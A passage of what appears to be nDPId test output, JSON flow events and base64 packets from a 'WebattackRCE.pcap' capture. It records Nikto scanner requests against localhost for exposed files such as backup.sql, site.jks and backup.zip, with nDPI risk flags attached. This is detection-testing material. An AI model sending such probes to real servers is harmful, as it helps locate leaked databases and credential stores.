Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1576420276970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276970,"pkt":"AAAAAAAAAAAAAAAACABFAADCS3NAAEAG8MB\/AAABfwAAAcMKH5AxI3MswmM4CYAYAED+tgAAAQEICp1m\/BKdZvwSR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1576420276972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276972,"pkt":"AAAAAAAAAAAAAAAACABFAADCyadAAEAGcox\/AAABfwAAAcMMH5BpA\/H\/vohuZIAYAED+tgAAAQEICp1m\/BSdZvwUR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1576420276973,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276973,"pkt":"AAAAAAAAAAAAAAAACABFAADA+8hAAEAGQG1\/AAABfwAAAcMOH5CJ5sOeTDtcfYAYAED+tAAAAQEICp1m\/BWdZvwVR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1576420276976,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276976,"pkt":"AAAAAAAAAAAAAAAACABFAADABYdAAEAGNq9\/AAABfwAAAcMQH5AThT3a7QA3zYAYAED+tAAAAQEICp1m\/BidZvwYR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1576420276977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276977,"pkt":"AAAAAAAAAAAAAAAACABFAADBYiVAAEAG2g9\/AAABfwAAAcMSH5B68lqAEiH3Y4AYAED+tQAAAQEICp1m\/BmdZvwZR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1576420276980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276980,"pkt":"AAAAAAAAAAAAAAAACABFAADBB+JAAEAGNFN\/AAABfwAAAcMUH5Dk6j++IkHQl4AYAED+tQAAAQEICp1m\/BydZvwcR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1576420276982,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276982,"pkt":"AAAAAAAAAAAAAAAACABFAAC98llAAEAGSd9\/AAABfwAAAcMWH5DjKcoLls+qsoAYAED+sQAAAQEICp1m\/B6dZvwdR0VUIC8xLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1576420276983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276983,"pkt":"AAAAAAAAAAAAAAAACABFAAC9nNlAAEAGn19\/AAABfwAAAcMYH5CM06SLK3vm\/IAYAED+sQAAAQEICp1m\/B+dZvwfR0VUIC8xLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1576420276985,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276985,"pkt":"AAAAAAAAAAAAAAAACABFAADCh5hAAEAGtJt\/AAABfwAAAcMaH5DK+b\/J7Nxpa4AYAED+tgAAAQEICp1m\/CGdZvwgR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1576420276986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276986,"pkt":"AAAAAAAAAAAAAAAACABFAADC6rNAAEAGUYB\/AAABfwAAAcMcH5BJJNLw4gK1PYAYAED+tgAAAQEICp1m\/CKdZvwiR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1576420276987,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276987,"pkt":"AAAAAAAAAAAAAAAACABFAADABtBAAEAGNWZ\/AAABfwAAAcMeH5DVkj6SMBYRsYAYAED+tAAAAQEICp1m\/COdZvwjR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 